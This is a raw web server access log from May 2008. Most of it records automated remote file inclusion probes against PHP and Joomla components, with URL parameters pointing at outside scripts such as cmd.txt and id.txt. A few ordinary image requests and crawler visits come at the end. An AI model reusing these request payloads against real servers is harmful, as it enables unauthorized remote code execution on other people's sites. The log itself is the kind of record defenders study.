83.222.128.178 - - [02/May/2008:10:26:29 -0700] "GET /logs/access_080224.log/components/com_performs/performs.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.18.76 - - [02/May/2008:10:27:40 -0700] "GET /logs/presse.php?do=ftp://84.32.137.157/incoming/upload/trex/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [02/May/2008:10:27:45 -0700] "GET /logs/presse.php?do=ftp://84.32.137.157/incoming/upload/trex/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.0.64 - - [02/May/2008:10:27:46 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://areairc.t35.com/super/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.15.0.64 - - [02/May/2008:10:27:47 -0700] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://areairc.t35.com/super/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.18.76 - - [02/May/2008:10:27:51 -0700] "GET /presse.php?do=ftp://84.32.137.157/incoming/upload/trex/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [02/May/2008:10:28:02 -0700] "GET /presse.php?do=ftp://84.32.137.157/incoming/upload/trex/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:10:29:12 -0700] "GET /logs/access_080321.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:10:29:20 -0700] "GET /logs/access_080224.log/components/com_performs/performs.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.17.174 - - [02/May/2008:10:29:54 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.23.241 - - [02/May/2008:10:29:54 -0700] "GET /logs/access_070707.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.98.11.154 - - [02/May/2008:10:30:04 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://areairc.t35.com/super/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.11.154 - - [02/May/2008:10:30:04 -0700] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://areairc.t35.com/super/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:10:30:21 -0700] "GET /logs/access.log/modules/My_eGallery/public/displayCategory.php?basepath=http://finkel.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:10:30:21 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://finkel.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:10:30:22 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?basepath=http://finkel.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:10:30:33 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:10:30:33 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
72.29.89.97 - - [02/May/2008:10:30:48 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
72.29.89.97 - - [02/May/2008:10:30:49 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:10:31:25 -0700] "GET /logs/access_080227.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:10:31:26 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:10:31:26 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:10:31:33 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:10:31:33 -0700] "GET /logs/access_080106.log/content.php?page=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
140.120.27.17 - - [02/May/2008:10:31:33 -0700] "GET /content.php?page=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
140.120.27.17 - - [02/May/2008:10:31:34 -0700] "GET /logs/content.php?page=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
77.221.130.3 - - [02/May/2008:10:31:36 -0700] "GET /logs/access_080226.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:10:31:38 -0700] "GET //includes/kb_constants.php?module_root_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:10:31:48 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:10:31:53 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:10:31:53 -0700] "GET /logs/access_080228.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:10:31:56 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:10:31:56 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:10:32:02 -0700] "GET /logs/access_080201.log/modules/My_eGallery/public/displayCategory.php?basepath=http://finkel.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:10:32:09 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:10:32:11 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:10:32:49 -0700] "GET /logs/access_080226.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.165.216.146 - - [02/May/2008:10:33:34 -0700] "GET /logs/access.log/modules/My_eGallery/public/displayCategory.php?basepath=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
68.165.216.146 - - [02/May/2008:10:33:34 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
68.165.216.146 - - [02/May/2008:10:33:35 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?basepath=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:10:33:39 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:10:33:39 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.96.252.191 - - [02/May/2008:10:34:06 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:10:34:37 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:10:34:38 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:10:34:38 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.13.173.87 - - [02/May/2008:10:34:51 -0700] "GET /logs/access_071028.log HTTP/1.1" 200 27183 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)" "www.dmulk.com"
83.175.248.213 - - [02/May/2008:10:35:14 -0700] "GET /logs//includes/mailaccess/errors.php?error=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
83.175.248.213 - - [02/May/2008:10:35:14 -0700] "GET //includes/mailaccess/errors.php?error=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
201.12.151.34 - - [02/May/2008:10:35:15 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://jogador.fxplus.mail333.su/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.12.151.34 - - [02/May/2008:10:35:16 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://jogador.fxplus.mail333.su/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.12.151.34 - - [02/May/2008:10:35:16 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://jogador.fxplus.mail333.su/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.122.1.59 - - [02/May/2008:10:36:06 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.122.1.59 - - [02/May/2008:10:36:06 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.153.103.135 - - [02/May/2008:10:36:19 -0700] "GET /logs//includes/mailaccess/errors.php?error=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
202.153.103.135 - - [02/May/2008:10:36:19 -0700] "GET //includes/mailaccess/errors.php?error=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
68.165.216.146 - - [02/May/2008:10:36:50 -0700] "GET /logs/access_080201.log/modules/My_eGallery/public/displayCategory.php?basepath=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:10:37:29 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:10:37:29 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.122.1.59 - - [02/May/2008:10:37:31 -0700] "GET /logs/newspublish/include.php?path[docroot]=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.122.1.59 - - [02/May/2008:10:37:32 -0700] "GET /newspublish/include.php?path[docroot]=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [02/May/2008:10:38:15 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.30.73.117 - - [02/May/2008:10:38:15 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:10:38:32 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:10:38:38 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:10:38:41 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:10:38:41 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:10:38:41 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:10:39:34 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
59.120.63.194 - - [02/May/2008:10:40:22 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://h1.ripway.com/berek/papi/mami/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.120.63.194 - - [02/May/2008:10:40:29 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://h1.ripway.com/berek/papi/mami/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:40:42 -0700] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:40:43 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:40:43 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:40:49 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:40:50 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:40:50 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [02/May/2008:10:40:52 -0700] "GET /logs/access_080216.log/main.php?x=http://www.loichua.org/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.197.2 - - [02/May/2008:10:41:12 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [02/May/2008:10:41:12 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [02/May/2008:10:41:12 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:10:41:27 -0700] "GET /logs/access_071219.log//modules/vwar/admin/admin.php?vwar_root=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:10:41:39 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:10:41:40 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:10:41:41 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.225.216.227 - - [02/May/2008:10:41:58 -0700] "GET /logs/access.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://cinta.sitesled.com/monjali/sken/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.225.216.227 - - [02/May/2008:10:41:58 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://cinta.sitesled.com/monjali/sken/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.225.216.227 - - [02/May/2008:10:41:58 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://cinta.sitesled.com/monjali/sken/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:42:32 -0700] "GET /logs/access_080218.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:10:43:24 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
200.168.250.60 - - [02/May/2008:10:43:45 -0700] "GET //includes/mailaccess/errors.php?error=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
200.168.250.60 - - [02/May/2008:10:43:45 -0700] "GET /logs//includes/mailaccess/errors.php?error=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:10:44:01 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:10:44:03 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
189.22.150.131 - - [02/May/2008:10:44:22 -0700] "GET /index.php?go1=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
66.225.216.227 - - [02/May/2008:10:44:31 -0700] "GET /logs/access_080120.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://cinta.sitesled.com/monjali/sken/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.225.216.227 - - [02/May/2008:10:44:50 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://cinta.sitesled.com/monjali/sken/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:10:45:35 -0700] "GET /logs/access_080321.log/solpot.html?body=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:10:45:35 -0700] "GET /solpot.html?body=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:10:45:35 -0700] "GET /logs/solpot.html?body=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.173.131.16 - - [02/May/2008:10:45:47 -0700] "GET /bikes/dteel/2008_01_26/IMG_4346M.JPG HTTP/1.1" 200 75886 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
75.173.131.16 - - [02/May/2008:10:45:47 -0700] "GET /bikes/dteel/2008_01_26/IMG_4338M.JPG HTTP/1.1" 200 76584 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
75.173.131.16 - - [02/May/2008:10:45:50 -0700] "GET /bikes/dteel/2008_01_26/IMG_4347M.JPG HTTP/1.1" 200 93210 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
75.173.131.16 - - [02/May/2008:10:45:50 -0700] "GET /bikes/dteel/2008_01_26/IMG_4349M.JPG HTTP/1.1" 200 73896 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
75.173.131.16 - - [02/May/2008:10:45:50 -0700] "GET /bikes/dteel/2008_01_26/IMG_4356M.JPG HTTP/1.1" 200 85422 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
75.173.131.16 - - [02/May/2008:10:45:52 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4360M.JPG HTTP/1.1" 200 108624 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
75.173.131.16 - - [02/May/2008:10:45:52 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4359M.JPG HTTP/1.1" 200 106754 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
75.173.131.16 - - [02/May/2008:10:45:53 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4362M.JPG HTTP/1.1" 200 102833 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
